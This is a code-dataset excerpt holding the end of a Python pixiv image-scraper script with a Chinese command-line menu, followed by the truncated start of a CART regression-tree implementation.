wait_gap\n\t\t#time.sleep(1.5)\n\t\twhile True:\n\t\t\tsize = 0\n\t\t\tret = \"\\t\\t\"\n\t\t\tretqueue = \"\\t\\t\\t\"\n\t\t\tlt = ['find','get','down','write']\n\t\t\tfor poolId in lt:\n\t\t\t\ts = self.__pool[poolId].getSize()\n\t\t\t\t#squeue = self.__pool[poolId].getQsize()\n\t\t\t\tret += \"%s %7s\\t\"%(str(poolId), str(s))\n\t\t\t\t#retqueue += \"%7s\\t\"%(str(squeue))\n\t\t\t\tsize += s\n\t\t\t\t#if s == 1:\n\t\t\t\t#\tself.__pool[poolId].getLast()\n\t\t\tprint(ret, flush = True)\n\t\t\t#print(retqueue, flush = True)\n\t\t\tif size == 0:\n\t\t\t\tbreak\n\t\t\ttime.sleep(wait_gap)\n\t\tprint(data, flush = True)\n\t#从关键字和页码中获取内容,写入日志文件logfd\n\tdef find(self, key, pageid, logfd, mutex = None):\n\t\tdomain = r\"http://www.pixiv.net/search.php?word=%s&order=date_d&p=%d\"%(key,pageid)\n\t\tenum = 0\n\t\tnum = 0\n\t\tres = self.getHtml(domain)\n\t\tif res:\n\t\t\thtml = res.text\n\t\telse:\n\t\t\treturn True\n\t\t#if pString.isNoItem(html):\n\t\t\t#print(key,pageid,logfd,domain)\n\t\t#\tsys.exit()\n\t\t#\treturn False\n\t\tilist = pString.getIidByFind(html)\n\t\tif len(ilist) == 0:\n\t\t\treturn False\n\t\tfor iid in ilist:\n\t\t\tif iid == \"\":\n\t\t\t\t#print(domain,\"HAS null iid\")\n\t\t\t\tcontinue\n\t\t\tenum += logfd.begin(iid + '_0')\n\t\t\tnum += 1\n\t\t#print(domain,num,enum)\n\t\tif enum == num:\n\t\t\treturn False\n\t\t#print(enum, num, pageid)\n\t\treturn True\n\tdef findT(self, args, mutex):\n\t\treturn self.find(args[0], args[1], args[2], mutex)\n\t#从图片id中获取图像下载信息\n\tdef get(self, iid, adir,logfd, mutex = None):\n\t\turl = self.getIid(iid)\n\t\tif url == []:\n\t\t\tlogfd.work(iid + '_' + str(0), [])\n\t\t\treturn True\n\t\tif len(url)>1:\n\t\t\tadir += 'pixiv%s/'%iid\n\t\t\tcreateFile(adir)\n\t\t#相册的处理\n\t\tfor i in range(len(url)):\n\t\t\tfilename = adir + 'pixiv%s%s%s'%\\\n\t\t\t(iid, '' if len(url) == 1 else (\"_\" + str(i)), pString.getSuffix(url[i]))\n\t\t\tif not fileExist(filename):\n\t\t\t\tself.__count()\n\t\t\tret = []\n\t\t\tret.append(url[i])\n\t\t\tret.append(self.getDomain(iid))\n\t\t\tret.append(filename)\n\t\t\tlogfd.work(iid + '_' + str(i), ret)\n\t\treturn True\n\tdef getT(self, args, mutex):\n\t\treturn self.get(args[0], args[1], args[2], mutex)\n\t#下载\n\tdef down(self, iid, url, refer, filename, logfd, mutex = None):\n\t\tif filename == None or fileExist(filename):\n\t\t\tself.add_job('write', iid, None, filename, logfd)\n\t\t\treturn True\n\t\tresponse = self.getHtml(url, stream = True, headers = makeHeader(refer), needLogin = False)\n\t\tif mutex: mutex.acquire()\n\t\tcreateFile(filename)\n\t\tself.add_job('write', iid, response, filename, logfd)\n\t\tif mutex: mutex.release()\n\t\treturn True\n\tdef downT(self, args, mutex):\n\t\treturn self.down(args[0], args[1], args[2], args[3], args[4], mutex)\n\t#写入文件\n\tdef write(self, iid, res, filename, logfd, mutex = None):\n\t\t#为句柄错误预留\n\t\t#if mutex: mutex.acquire()\n\t\tif res == None:\n\t\t\tlogfd.end(iid)\n\t\t\treturn True\n\t\twith open(filename, \"wb\") as fd:\n\t\t\tfd.write(res.content)\n\t\t\tfd.flush()\n\t\t#if mutex: mutex.release()\n\t\tlogfd.end(iid)\n\t\treturn True\n\tdef writeT(self, args, mutex):\n\t\treturn self.write(args[0], args[1], args[2], args[3], mutex)\n\t#从图片id获取图片地址\n\tdef getDomain(self, iid, mode = 'medium'):\n\t\tdomain = r\"http://www.pixiv.net/member_illust.php?mode=%s&illust_id=%s\"%(mode,iid)\n\t\treturn domain\n\t#从图片id中获取图片下载地址\n\tdef getIid(self, iid):\n\t\tdomain = self.getDomain(iid)\n\t\tres = self.getHtml(domain, timeout = 30.05)\n\t\tif not res:\n\t\t\treturn 
[]\n\t\thtml = res.text\n\t\tbig = pString.getBig(html)\n\t\t#如果是mode=big的图片\n\t\tif len(big) !=0:\n\t\t\tbigD = self.getDomain(big[0],'big')\n\t\t\thtml = self.getHtml(bigD, headers = makeHeader(domain), timeout = 30.05).text\n\t\t\tret = pString.getBigPic(html)\n\t\t\treturn ret\n\t\telse:\n\t\t\tmg = pString.getManga(html)\n\t\t\t#如果是mode=manga类型的图片\n\t\t\tif len(mg) != 0:\n\t\t\t\tdomain = self.getDomain(mg[0],'manga')\n\t\t\t\thtml = self.getHtml(domain, timeout = 30.05).text\n\t\t\t\tret = pString.getMangaPic(html)\n\t\t\t\tpagelen = len(ret)\n\t\t\t\tret = []\n\t\t\t\tfor i in range(pagelen):\n\t\t\t\t\tmangaD = self.getDomain(mg[0],'manga_big')+\"&page=%d\"%i\n\t\t\t\t\thtml = self.getHtml(mangaD, timeout = 30.05).text\n\t\t\t\t\turl = pString.getBigPic(html)\n\t\t\t\t\tret.append(url[0])\n\t\t\t\treturn ret\n\t\t\t#普通的单张图片\n\t\t\telse:\n\t\t\t\tret = pString.getPic(html)\n\t\t\t\treturn ret\n\t#为按照画师下载预留\n\tdef getPid(self):\n\t\tpass\n\tdef getNameByPid(self, pid):\n\t\tif pid in self.person:\n\t\t\treturn self.person[pid]\n\t\tdomain = \"http://www.pixiv.net/member.php?id=%s\"%pid\n\t\thtml = self.getHtml(domain)\n\t\tif not html:\n\t\t\treturn None\n\t\tpname = pString.getPname(html.text)\n\t\tself.person[pid] = pname\n\t\treturn pname\n#包装好的命令行操作, cFunc系列应该写入底层\nclass SpiderCmd(Spider):\n\t#构造函数\n\tdef __init__(self):\n\t\tsuper(SpiderCmd, self).__init__()\n\t\tself.log = makeLog.mainLog()\n\t\tself.flag_login = False\n\t#登录\n\tdef clogin(self):\n\t\tglobal userFile\n\t\twhile True:\n\t\t\tuser = User(userFile)\n\t\t\tprint(\"登录中...\", flush = True)\n\t\t\tif self.login(user):\n\t\t\t\tprint(\"登陆成功!\\n\", flush = True)\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tprint(\"登录失败!\\n\", flush = True)\n\t\t\tif os.path.exists(\"userFile.pickle\"):\n\t\t\t\tos.remove(\"userFile.pickle\")\n\t\tself.flag_login = True\n\t#获取一个条目的id\n\tdef oFind(self, key, wait = True):\n\t\tglobal find_gap\n\t\tglobal proxies\n\t\tproxies = use_proxies\n\t\tif not self.flag_login: self.clogin()\n\t\tlogfd = self.log.getLog(key)\n\t\ttags = self.log.getTag(key)\n\t\tprint(\"查询 条目 [%s] 开 始:\"%(key), flush = True)\n\t\tfor tag in tags:\n\t\t\tself.set_stat('find', 'flag', True)\n\t\t\tpageid = 1\n\t\t\tprint(\"\\t查询 条目 [%s] 关键词 [%s] 开始\"%(key, tag), flush = True)\n\t\t\twhile self.get_stat('find', 'flag'):\n\t\t\t\tif pageid >= 1000:\n\t\t\t\t\tbreak\n\t\t\t\tprint(\"\\t\\t查询 条目 [%s] 关键词 [%s] 前 %s 页开始\"%(key, tag, pageid-1+find_gap), flush = True)\n\t\t\t\tfor i in range(find_gap):\n\t\t\t\t\tp = pageid + i\n\t\t\t\t\tself.add_job('find', tag, p, logfd)\n\t\t\t\tpageid += find_gap\n\t\t\t\tif wait:\n\t\t\t\t\tself.wait_allcomplete(\"\\t\\t查询 条目 [%s] 关键词 [%s] 前 %s 页完成\"%(key, tag, pageid-1))\n\t\t\tprint(\"\\t查询 条目 [%s] 关键词 [%s] 完成\"%(key, tag), flush = True)\n\t\tprint(\"查询 条目 [%s] 完 成.\\n\"%(key), flush = True)\n\t#获取一个条目下载地址\n\tdef oGet(self, key, wait = False, isP = False):\n\t\tif not self.flag_login: self.clogin()\n\t\tif(\"画师\" in key):\n\t\t\t#print(key)\n\t\t\tpid = key[3:-1]\n\t\t\tpname = self.getNameByPid(pid)\n\t\t\tif not pname:\n\t\t\t\tprint(\"\\t[%s] 用户已经不存在\"%pid, flush = True);\n\t\t\t\treturn\n\t\t\t#print(pid,pname)\n\t\t\t#input()\n\t\tif isP:\n\t\t\tadir = defaultDir + '_画师/' + pString.checkDirName(key[2:] + pname) + '/'\n\t\telse:\n\t\t\tadir = defaultDir + pString.checkDirName(key) + '/'\n\t\tlogfd = self.log.getLog(key)\n\t\tiidlist = logfd.get()\n\t\tlocallist = []\n\t\tprint(\"\\t[%s] 开始获取下载地址\"%key, flush = True)\n\t\tfor iid in iidlist:\n\t\t\tlocallist.append(iid)\n\t\tfor iid in 
locallist:\n\t\t\tself.add_job('get', iid[:-2], adir, logfd)\n\t\tif wait:\n\t\t\tprint(\"\\t\\t等待获取完成:\", flush = True)\n\t\t\tself.wait_allcomplete(\"\\t[%s] 获取下载地址完成\"%key)\n\t#下载一个条目的图片\n\tdef oDown(self, key, wait = True):\n\t\t#if not self.flag_login: self.clogin()\n\t\tlogfd = self.log.getLog(key)\n\t\tddict = logfd.getDown()\n\t\t#使用深复制\n\t\tlocaldict = {}\n\t\tfor iid in ddict:\n\t\t\tlocaldict[iid] = ddict[iid]\n\t\tmsg = key\n\t\t\"\"\"\n\t\tif(\"画师\" in key):\n\t\t\tpid = key[3:-1]\n\t\t\tpname = self.getNameByPid(pid)\n\t\t\tif not pname:\n\t\t\t\tprint(\"\\t[%s] 用户已经不存在\"%pid);\n\t\t\t\treturn\n\t\t\tmsg += pname\n\t\t\"\"\"\n\t\tprint(\"\\t%s 开始下载:\"%msg, flush = True)\n\t\tfor iid in localdict:\n\t\t\td = localdict[iid]\n\t\t\tif len(d)!=0:\n\t\t\t\turl = d[0]\n\t\t\t\trefer = d[1]\n\t\t\t\tfilename = d[2]\n\t\t\telse:\n\t\t\t\turl,refer,filename = None,None,None\n\t\t\tself.add_job('down', iid, url, refer, filename, logfd)\n\t\tif wait:\n\t\t\tprint(\"\\t\\t等待下载完成:\", flush = True)\n\t\t\tself.wait_allcomplete(\"\\t%s 下载完成\"%msg)\n\t#为画师设计的查询功能\n\tdef pFind(self, pid, wait = True):\n\t\t#print(pid)\n\t\tif not self.flag_login: self.clogin()\n\t\tpname = self.getNameByPid(pid)\n\t\tif not pname:\n\t\t\tprint(\"\\t[%s] 用户已经不存在\"%pid, flush = True);\n\t\t\treturn\n\t\tkey = \"画师[%s]\"%(pid)\n\t\tfullkey = \"画师[%s]%s\"%(pid, pname)\n\t\tfilename = pString.checkDirName(key)\n\t\tlogfd = self.log.getLog(key)\n\t\t#\n\t\tprint(\"画师 [%s]%s 作品遍历开始\"%(pid,pname), flush = True)\n\t\tpageid = 1\n\t\teflag = True\n\t\twhile eflag:\n\t\t\tdomain = \"http://www.pixiv.net/member_illust.php?id=%s&type=all&p=%d\"%(pid,pageid)\n\t\t\thtml = self.getHtml(domain)\n\t\t\tif not html:\n\t\t\t\tbreak\n\t\t\tif pString.isNullInPerson(html.text):\n\t\t\t\tbreak\n\t\t\tiidlist = pString.getIidByPerson(html.text)\n\t\t\t#print(domain,iidlist)\n\t\t\tif len(iidlist) == 0:\n\t\t\t\tbreak\n\t\t\tfor iid in iidlist:\n\t\t\t\tif logfd.begin(iid + '_0'):\n\t\t\t\t\teflag = False\n\t\t\tif eflag:\n\t\t\t\tprint(\"\\t画师 [%s]%s 作品前%d页遍历完成\"%(pid,pname,pageid), flush = True)\n\t\t\tpageid += 1\n\t\tprint(\" [%s]%s 作品遍历完成\"%(pid,pname), flush = True)\n\t#获取所有图片id\n\tdef cFind(self):\n\t\tglobal proxies\n\t\tproxies = use_proxies\n\t\tglobal find_gap\n\t\tprint(proxies, flush = True)\n\t\tif not self.flag_login: self.clogin()\n\t\tprint(\"开始查询待下载作品:\", flush = True)\n\t\tkeylist = self.log.getName()\n\t\tif \"画师\" in keylist:\n\t\t\tpidlist = self.log.getTag(\"画师\")\n\t\t\tfor pid in pidlist:\n\t\t\t\tself.pFind(pid)\n\t\tfor key in keylist:\n\t\t\tif key != \"画师\":\n\t\t\t\tself.oFind(key)\n\t\tprint(\"待下载作品查询完毕.\", flush = True)\n\t#获取所有下载地址\n\tdef cGet(self):\n\t\tglobal proxies\n\t\tproxies = use_proxies\n\t\tif not self.flag_login: self.clogin()\n\t\tkeylist = self.log.getName()\n\t\tprint(\"获取全部作品下载地址:\", flush = True)\n\t\tfor key in keylist:\n\t\t\tif key != \"画师\":\n\t\t\t\tself.oGet(key)\n\t\t\telse:\n\t\t\t\tpidlist = self.log.getTag(key)\n\t\t\t\tfor pid in pidlist:\n\t\t\t\t\tpname = self.getNameByPid(pid)\n\t\t\t\t\tif not pname:\n\t\t\t\t\t\tprint(\"\\t[%s] 用户已经不存在\"%pid, flush = True);\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tkey = \"画师[%s]\"%(pid)\n\t\t\t\t\tfullkey = \"画师[%s]%s\"%(pid, pname)\n\t\t\t\t\tfilename = pString.checkDirName(key)\n\t\t\t\t\tself.oGet(filename, isP = True)\n\t\tprint(\"\\t\\t等待获取完成:\", flush = True)\n\t\tself.wait_allcomplete(\"获取下载地址完成.\\n\")\n\t#下载图片\n\tdef cDown(self):\n\t\tglobal proxies\n\t\tif not down_by_proxies:\n\t\t\tproxies = {}\n\t\t#if not self.flag_login: 
self.clogin()\n\t\tkeylist = self.log.getName()\n\t\tprint(\"开始下载全部作品:\", flush = True)\n\t\tfor key in keylist:\n\t\t\tif key != \"画师\":\n\t\t\t\tself.oDown(key)\n\t\t\telse:\n\t\t\t\tpidlist = self.log.getTag(key)\n\t\t\t\tfor pid in pidlist:\n\t\t\t\t\t#pname = self.getNameByPid(pid)\n\t\t\t\t\t#if not pname:\n\t\t\t\t\t#\tprint(\"\\t[%s] 用户已经不存在\"%pid);\n\t\t\t\t\t#\tcontinue\n\t\t\t\t\tkey = \"画师[%s]\"%(pid)\n\t\t\t\t\t#fullkey = \"画师[%s]%s\"%(pid, pname)\n\t\t\t\t\tfilename = pString.checkDirName(key)\n\t\t\t\t\tself.oDown(filename)\n\t\tprint(\"全部作品下载完成.\", flush = True)\n\t#一个工作进程\n\tdef work(self):\n\t\tself.recount()\n\t\tself.cFind()\n\t\tself.cGet()\n\t\tself.cDown()\n\tdef work_get(self):\n\t\tself.recount()\n\t\tself.cGet()\n\tdef work_down(self):\n\t\tself.recount()\n\t\tself.cDown()\n\t#\n\tdef work_one(self, key):\n\t\tkdict = self.log.getName()\n\t\tif key == \"画师\":\n\t\t\tself.recount()\n\t\t\tpidlist = self.log.getTag(key)\n\t\t\tfor pid in pidlist:\n\t\t\t\tself.pFind(pid)\n\t\t\tfor pid in pidlist:\n\t\t\t\tpname = self.getNameByPid(pid)\n\t\t\t\tif not pname:\n\t\t\t\t\tprint(\"\\t[%s] 用户已经不存在\"%pid, flush = True);\n\t\t\t\t\tcontinue\n\t\t\t\tkey = \"画师[%s]\"%(pid)\n\t\t\t\tfullkey = \"画师[%s]%s\"%(pid, pname)\n\t\t\t\tfilename = pString.checkDirName(key)\n\t\t\t\tself.oGet(filename, wait = True, isP = True)\n\t\t\t#print(\"\\t\\t等待获取完成:\")\n\t\t\t#self.wait_allcomplete(\"获取下载地址完成.\\n\")\n\t\t\tfor pid in pidlist:\n\t\t\t\tpname = self.getNameByPid(pid)\n\t\t\t\tif not pname:\n\t\t\t\t\tprint(\"\\t[%s] 用户已经不存在\"%pid, flush = True);\n\t\t\t\t\tcontinue\n\t\t\t\tkey = \"画师[%s]\"%(pid)\n\t\t\t\tfullkey = \"画师[%s]%s\"%(pid, pname)\n\t\t\t\tfilename = pString.checkDirName(key)\n\t\t\t\tself.oDown(filename)\n\t\t\treturn\n\t\tif not key in kdict:\n\t\t\tprint(\"条目名 %s 不在条目表中\"%(key), flush = True)\n\t\t\treturn\n\t\tself.recount()\n\t\tself.oFind(key)\n\t\tself.oGet(key, wait = \"True\")\n\t\tself.oDown(key)\n\tdef work_some(self):\n\t\tmsg = \"\\t输入条目名,选择要下载的条目。用空格分隔\\n\\t\"\n\t\tkeylist = input(msg)\n\t\tkeylist = keylist.split(' ')\n\t\tfor key in keylist:\n\t\t\tif key != \"\":\n\t\t\t\tself.work_one(key)\n\t\tprint()\n\t#添加条目\n\tdef add(self):\n\t\tmsg = \"输入一个图片条目,按照如下格式\\n\\\n\t\t\\t条目名称 关键字1 关键字2 ....\\n关键字和条目间用空格隔开\\n\"\n\t\tdata = input(msg)\n\t\tif data[0:2] == \"画师\":\n\t\t\tprint(\"`画师`为关键字不允许使用\", flush = True)\n\t\t\treturn\n\t\tck = data.split(' ')\n\t\tfor c in ck:\n\t\t\tif c == '' or c == ' ':\n\t\t\t\tprint(\"输入格式不正确: 多余的空格或占位符\", flush = True)\n\t\t\t\treturn\n\t\tself.log.append(data)\n\t#删除条目\n\tdef remove(self):\n\t\tmsg = \"请输入需要删除的条目名称:\\n\\t\"\n\t\tdata = input(msg)\n\t\tif data[0:2] == \"画师\":\n\t\t\tprint(\"`画师`为关键字不允许使用\", flush = True)\n\t\t\treturn\n\t\ttry:\n\t\t\tself.log.delete(data)\n\t\t\tprint(\"删除成功!\\n\", flush = True)\n\t\texcept Exception as e:\n\t\t\tprint(e, flush = True)\n\tdef addP(self):\n\t\tmsg = \"输入添加的画师的id,用空格分隔:\\n\\t\"\n\t\tdata = input(msg)\n\t\tck = data.split(' ')\n\t\tfor c in ck:\n\t\t\tif c in ['\\n','\\r','\\t','\\v',' ']:\n\t\t\t\tcontinue\n\t\t\tif not c.isdigit():\n\t\t\t\tprint(\"输入格式不正确: 不是数字\", flush = True)\n\t\t\t\treturn\n\t\tself.log.append(\"画师\"+\" \"+data)\n\tdef removeP(self):\n\t\tmsg = \"请输入需要删除的画师id:\\n\\t\"\n\t\tdata = input(msg)\n\t\ttry:\n\t\t\tself.log.delete(\"画师\"+\" \"+data)\n\t\t\tprint(\"删除成功!\\n\", flush = True)\n\t\texcept Exception as e:\n\t\t\tprint(e, flush = True)\n\tdef importP(self):\n\t\tglobal proxies\n\t\tproxies = use_proxies\n\t\tif not self.flag_login: 
self.clogin()\n\t\t#\n\t\ttags = self.log.getTag(\"画师\")\n\t\tpageid = 1\n\t\teflag = True\n\t\twhile eflag:\n\t\t\tdomain = \"http://www.pixiv.net/bookmark.php?type=user&rest=show&p=%d\"%(pageid)\n\t\t\thtml = self.getHtml(domain)\n\t\t\tif not html:\n\t\t\t\tbreak\n\t\t\tif pString.isNullInBookmark(html.text):\n\t\t\t\tbreak\n\t\t\tiidlist = pString.getIidByBookmark(html.text)\n\t\t\t#print(domain,iidlist)\n\t\t\tif len(iidlist) == 0:\n\t\t\t\tbreak\n\t\t\teflag = False\n\t\t\tfor iid in iidlist:\n\t\t\t\tif not iid in tags:\n\t\t\t\t\teflag = True\n\t\t\tdata = ' '.join(iidlist)\n\t\t\t#print(data)\n\t\t\tif eflag:\n\t\t\t\tself.log.append(\"画师\"+\" \"+data)\n\t\t\tprint(\"\\t关注列表第%d页遍历完成\"%(pageid), flush = True)\n\t\t\tpageid += 1\n\t\tprint(\"关注列表遍历完成\", flush = True)\n\t#输出所有条目\n\tdef prspace(self, s):\n\t\tc = [chr(i) for i in range(0,255)]\n\t\tret = 20\n\t\tfor i in s:\n\t\t\tret -= 1 if i in c else 2\n\t\treturn ret\n\tdef prtag(self):\n\t\tnamelist = self.log.getName()\n\t\tnamelist.sort()\n\t\tif '画师' in namelist:\n\t\t\tnamelist.remove('画师')\n\t\t\tnamelist.append('画师')\n\t\tprint(\"%s %s\\t['%s']\"%('序号', '条目名'+(17*' '),'关键字'), flush = True)\n\t\tfor index,name in enumerate(namelist):\n\t\t\ttags = self.log.getTag(name)\n\t\t\ttags.sort()\n\t\t\tprint(\"%4d %s\\t\"%(index, name+' '*self.prspace(name)), end = \"\", flush = True)\n\t\t\tfor tag in tags:\n\t\t\t\tprint(repr(tag), end = \" \", flush = True)\n\t\t\t\ttime.sleep(0.01)\n\t\t\tprint()\n#命令行交互控制器\ndef controller():\n\twork = SpiderCmd()\n\twhile True:\n\t\tprint(\"程序首页\", flush = True)\n\t\tprint(\"当前存在条目:\", flush = True)\n\t\tmsg = '输入序号启动指定功能\\n\\\n\t\t\t0.退出\\n\\\n\t\t\t1.显示Tag\\t\\t2.下载所有\\n\\\n\t\t\t3.继续下载\\t\\t4.选择下载\\n\\\n\t\t\t5.新建Tag\\t\\t6.删除Tag\\n\\\n\t\t\t7.添加画师\\t\\t8.删除画师\\n\\\n\t\t\t9.获取地址\\t\\ta.导入关注\\n'\n\t\tmode = input(msg)\n\t\tif mode == \"0\":\n\t\t\tbreak\n\t\telif mode == \"1\":\n\t\t\twork.prtag()\n\t\telif mode == \"2\":\n\t\t\twork.work()\n\t\telif mode == \"3\":\n\t\t\twork.work_down()\n\t\telif mode == \"4\":\n\t\t\twork.work_some()\n\t\telif mode == \"5\":\n\t\t\twork.add()\n\t\telif mode == \"6\":\n\t\t\twork.remove()\n\t\telif mode == \"7\":\n\t\t\twork.addP()\n\t\telif mode == \"8\":\n\t\t\twork.removeP()\n\t\telif mode == \"9\":\n\t\t\twork.work_get()\n\t\telif mode == \"a\":\n\t\t\twork.importP()\n\t\telse:\n\t\t\tprint(\"序号错误\", flush = True)\n\t\tif mode in [\"1\",\"2\",\"3\",\"4\",\"9\"]:\n\t\t\tprint(\"\\n回车以继续\", flush = True)\n\t\t\tinput()\n\t\telse:\n\t\t\tprint(\"\", flush = True)\ndef main():\n\tcreateFile(\"developer/\")\n\tcreateFile(\"thread/\")\n\tcontroller()\n\tpass\nif __name__ == '__main__':\n\tmain()\n","sub_path":"pSpider.py","file_name":"pSpider.py","file_ext":"py","file_size_in_byte":22944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"21837508","text":"# Implementation of Regression Tree using CART algorithm\r\n__author__ = 'Ricardo'\r\n\r\nimport sys\r\nimport csv\r\nimport math\r\nimport copy\r\nimport time\r\nimport numpy as np\r\nfrom collections import Counter\r\nfrom numpy import * # genfromtxt\r\nimport LGRforSimulation1 as lr\r\n\r\n# reading from the file using numpy genfromtxt\r\ndef load_csv(file):\r\n X = genfromtxt(file, delimiter=\",\", dtype=str)\r\n # print(X)\r\n return X\r\n\r\n\r\ndef generate_set(x, Pi, CrossTest = 1):\r\n import numpy as np\r\n import random\r\n # print(Pi.shape)\r\n Feature_name = x[0, :10]\r\n # print('Feature_name :', Feature_name)\r\n # print(X[1:, 1:2].shape, 
X[1:, 9:].shape)\r\n # print(\"type: \", x[1])\r\n X = np.concatenate((x[1:, :], Pi), axis=1)\r\n # print(\"new X: \", X)\r\n random.seed(152)\r\n np.random.shuffle(X)\r\n # print(\"type: \", X[1])\r\n Label = X[:, -5:]\r\n # print(Label.shape, 'Label :', Label)\r\n Y = Label[:, 2]\r\n # print(Y.shape, \"Y is\", Y)\r\n # print(Y)\r\n j = Y.reshape(len(Y), 1)\r\n # print(j.shape, \"J is\", j)\r\n new_X = X[:, :10]\r\n # normalizing the data step\r\n # normalized_X = normalize(new_X)\r\n # print(\"Normal X\",normalized_X)\r\n # https://blog.csdn.net/qq_38150441/article/details/80488800\r\n final_X = np.concatenate((new_X, Label), axis=1)\r\n # print(\"np \", final_X)\r\n X = final_X\r\n size_of_rows = X.shape[0]\r\n # test data size is 10%\r\n num_test = round(0.3 * (X.shape[0]))\r\n start = 0\r\n end = num_test\r\n test_attri_list = []\r\n test_class_names_list = []\r\n training_attri_list = []\r\n training_class_names_list = []\r\n # ten fold cross-validation\r\n if CrossTest == 0:\r\n X_training = X[:, :-4]\r\n X_training = X_training.astype(np.float)\r\n # print(\"X:\", X_training)\r\n y_training = X[:, -4:]\r\n y_train = y_training.astype(np.float)\r\n # print(\"Y:\", y_train)\r\n training_attri_list.append(X_training)\r\n training_class_names_list.append(y_train)\r\n return Feature_name, None, None, training_attri_list, training_class_names_list\r\n for i in range(1):\r\n X_test = X[start:end, :]\r\n tmp1 = X[:start, :]\r\n tmp2 = X[end:, :]\r\n X_training = np.concatenate((tmp1, tmp2), axis=0)\r\n # X_training = X[:start,:]+ X[end: , :]\r\n y_test = X_test[:, -4:]\r\n # flatten https://blog.csdn.net/liuweiyuxiang/article/details/78220080\r\n # y_test = y_test.flatten()\r\n # print(\"y_test\", y_test)\r\n y_training = X_training[:, -4:]\r\n # y_training = y_training.flatten()\r\n y_train = y_training.astype(np.float)\r\n y_test = y_test.astype(np.float)\r\n X_test = X_test[:, :-4]\r\n X_training = X_training[:, :-4]\r\n X_test = X_test.astype(np.float)\r\n X_training = X_training.astype(np.float)\r\n test_attri_list.append(X_test)\r\n test_class_names_list.append(y_test)\r\n training_attri_list.append(X_training)\r\n training_class_names_list.append(y_train)\r\n # print(\"start is\",start)\r\n # print(\"end is\",end)\r\n start = end\r\n end = end + num_test\r\n # print(\"training_class_names_list\", training_class_names_list)\r\n return Feature_name, test_attri_list, test_class_names_list, training_attri_list, training_class_names_list # (X_test,y_test,X_training,y_train)\r\n\r\n\r\n# To calculate Tao_value , the input value should be transport by the get_remainder_dict function\r\ndef taoob (attri_list, check=0):\r\n # add a function tao !!\r\n # print(np.array(attri_list).shape)\r\n Treat_acc = 0\r\n Detail = False\r\n number_sample = len(attri_list)\r\n if number_sample == 0:\r\n # print('THIS IS SOME WRONG!!!')\r\n return 0\r\n #if number_sample < 150:\r\n # Detail = True\r\n sum0 = 0\r\n sum1 = 0\r\n tot0 = 0\r\n tot1 = 0\r\n for item in attri_list:\r\n label = item[1]\r\n # print(label)\r\n Y = label[0]\r\n '''\r\n if label[4]>0.95:\r\n label[4] = 0.95\r\n elif label[4] < 0.05:\r\n label[4] = 0.05\r\n '''\r\n label[3] = 0.5\r\n if label[1]:\r\n # print(label[1], label[4])\r\n sum1 += Y / label[3]\r\n tot1 += 1 / label[3]\r\n else:\r\n # print(label[1], 1 - label[4])\r\n sum0 += Y / (1 - label[3])\r\n tot0 += 1/(1 - label[3])\r\n '''\r\n print('sum0 = ', sum0)\r\n print('sum1 = ', sum1)\r\n print('tot0 = ', tot0)\r\n print('tot1 = ', tot1)\r\n '''\r\n if tot1 == 0:\r\n # Acc = 
0\r\n return 0\r\n else:\r\n Acc = sum1/tot1\r\n if tot0 == 0:\r\n # Ref = 0\r\n return 0\r\n else:\r\n Ref = sum0/tot0\r\n taoob = Acc - Ref\r\n if Detail:\r\n print('number : ', number_sample)\r\n print('Acc = ', Acc, ' sum1: ', sum1, ' tot1 : ', tot1)\r\n print('Ref = ', Ref, ' sum0: ', sum0, ' tot0 : ', tot0)\r\n print('taoob : ', taoob)\r\n tao = sum(taoob)\r\n # print(\"tao : \", tao)\r\n return tao\r\n\r\n\r\ndef Prework(attri_list):\r\n temptdata = attri_list[0]\r\n # print(\"input data to get tao = \", temptdata)\r\n Tao_Value = taoob(temptdata)\r\n print('Tao_initial = ', Tao_Value)\r\n return Tao_Value\r\n\r\n\r\ndef build_dict_of_attributes_with_class_values(X, y): # ,feature):\r\n dict_of_attri_class_values = {}\r\n fea_list = []\r\n for i in range(X.shape[1]): # map all features\r\n fea = i\r\n l = X[:, i]\r\n # print(l)\r\n attribute_list = []\r\n count = 0\r\n # add all features to the dic and add the labal belong to every sample\r\n for j in l:\r\n # print('j: ', j)\r\n attribute_value = []\r\n attribute_value.append(j)\r\n attribute_value.append(y[count, :])\r\n attribute_list.append(attribute_value)\r\n count += 1\r\n dict_of_attri_class_values[fea] = attribute_list\r\n fea_list.append(fea)\r\n # print(\"dict_of_attri_class_values: \", dict_of_attri_class_values[0][1])\r\n return dict_of_attri_class_values, fea_list\r\n # features_with_max_gain_and_theta(dict_of_attri_class_values)\r\n\r\n\r\nclass Node(object):\r\n def __init__(self, val, lchild, rchild, feature, FeatureNumber, the, depth, leaf, Prune_value):\r\n self.root_value = val\r\n self.root_left = lchild\r\n self.root_right = rchild\r\n self.feature = feature\r\n self.theta = the\r\n self. Prune_value = Prune_value\r\n self.depth = depth\r\n self.leaf = leaf ### bool type\r\n self.FeatureNumber = FeatureNumber\r\n\r\n # method to identify if the node is leaf\r\n def is_leaf(self):\r\n return self.leaf\r\n\r\n # method to return threshold value\r\n def ret_thetha(self):\r\n return self.theta\r\n\r\n def ret_root_value(self):\r\n return self.root_value\r\n\r\n def ret_llist(self):\r\n return self.root_left\r\n\r\n def ret_rlist(self):\r\n return self.root_right\r\n\r\n def ret_depth(self):\r\n return self.depth\r\n\r\n\r\n def ret_feature(self):\r\n return self.feature\r\n\r\n\r\n def __repr__(self):\r\n return \"(%r, %s, %r, %r, %r, %r, %r)\" % (self.root_value, self.feature, self.theta, self.leaf, self.depth, self.root_left, self.root_right,)\r\n\r\n\r\n# Decision Tree object\r\nclass DecisionTree(object):\r\n fea_list = []\r\n\r\n def __init__(self):\r\n self.root_node = None\r\n\r\n # fit the decision tree\r\n def fit(self, dict_of_everything, cl_val, eta_min_val, Feature_name, Tao):\r\n root_node = self.create_decision_tree(dict_of_everything, cl_val, eta_min_val, Feature_name, Tao, 1) # ,fea_list)\r\n return root_node\r\n\r\n # calculate the mean values for all the class labels\r\n def cal_mean_class_values(self, class_values):\r\n mean_val = sum(class_values) / float(len(class_values))\r\n # print(mean_val)\r\n return mean_val\r\n\r\n # method to calculate best threshold value for each feature\r\n def cal_best_theta_value(self, ke, attri_list, minsize, maxbucketNum): ### The atri_listt is the value belong to one feature [1] is the label\r\n data = []\r\n # class_values = []\r\n # print(\"ke is: \", ke)\r\n # print(attri_list, ': is attri_list')\r\n for i in attri_list:\r\n # val = float(i[0])\r\n data.append(i[0])\r\n # 